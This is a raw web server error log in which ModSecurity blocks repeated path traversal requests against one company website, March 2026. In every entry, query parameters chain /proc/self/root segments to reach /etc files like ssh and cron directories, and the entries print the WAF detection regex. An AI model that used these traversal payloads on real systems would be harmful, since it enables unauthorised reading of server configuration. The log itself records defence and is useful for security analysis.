[Mon Mar 16 11:16:22.683219 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:49894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQtrABkC4fWIHEf8HitAAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:23.845639 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:49906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQt3jZBu2q05ozVU9NewAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:25.154319 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:49908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQuQlT9VtDQc7bgUylIAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:26.437603 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:49918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQuv9ocpUE4ed4uDzlSgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:28.660997 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:49922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQvI6lpbStxTqkSktkmQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:29.961397 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:49938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQvZqj1wV0Si-Okefi8gAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:31.408399 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:40812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQvhXjF1vJNtV6CWrvIAAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:16:42.962058 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:39128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQynjZBu2q05ozVU9NhwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:44.271842 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:54320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQzJqj1wV0Si-Okefi9gAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:46.383114 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:54322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQzbABkC4fWIHEf8HiuwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:47.673627 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:54330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQz3jZBu2q05ozVU9NiAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:48.960314 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:54332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ0Jqj1wV0Si-Okefi-AAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:50.283360 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:33742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ0hXjF1vJNtV6CWrvJQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:51.514048 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:33758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ07ABkC4fWIHEf8HivAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:52.781443 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:33766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ1P9ocpUE4ed4uDzlTgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:55.426429 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:33774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ1glT9VtDQc7bgUylTQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:56.769498 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:33790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ2AlT9VtDQc7bgUylUgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:58.031328 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:33798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ2nbQATo66fKoS7xFmwAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:16:59.329702 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:33814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ27ABkC4fWIHEf8HivQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:00.673243 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:38406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ3P9ocpUE4ed4uDzlUwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:02.006989 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:38422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ3pqj1wV0Si-Okefi-gAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:03.408491 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:38436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] 